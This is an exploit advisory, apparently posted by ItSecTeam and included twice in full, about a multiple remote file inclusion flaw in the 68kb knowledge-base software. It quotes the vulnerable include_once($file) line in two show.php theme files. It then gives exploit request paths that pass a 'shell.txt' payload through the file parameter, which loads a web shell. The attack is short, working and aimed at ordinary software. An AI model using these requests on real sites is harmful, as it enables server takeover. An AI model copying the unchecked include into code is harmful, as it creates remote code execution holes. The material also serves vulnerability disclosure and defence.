===========================================================================
( #Topic : 68kb
( #Bug type : multi remote file include
( #Download : http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com #
( #Website: http://www.itsecteam.com #
( #Forum : http://forum.ITSecTeam.com #
( #Original Advisory:
www.ITSecTeam.com/en/vulnerabilities/vulnerability27.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!
vul:===================================================================
path/themes/front/default/modules/show.php
<?php include_once($file); ?>
vul:===================================================================
path/themes/admin/default/modules/show.php
<?php include_once($file); ?>
---------------------------------------------------------------------
exploit:================================================================
path/themes/front/default/modules/show.php?file=shell.txt?
path/themes/admin/default/modules/show.php?file=shell.txt?
--------------------------------------
ItSecTeam_68kb.txt
===========================================================================
( #Topic : 68kb
( #Bug type : multi remote file include
( #Download : http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com #
( #Website: http://www.itsecteam.com #
( #Forum : http://forum.ITSecTeam.com #
( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability27.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!
vul:===================================================================
path/themes/front/default/modules/show.php
<?php include_once($file); ?>
vul:===================================================================
path/themes/admin/default/modules/show.php
<?php include_once($file); ?>
---------------------------------------------------------------------
exploit:================================================================
path/themes/front/default/modules/show.php?file=shell.txt?
path/themes/admin/default/modules/show.php?file=shell.txt?
--------------------------------------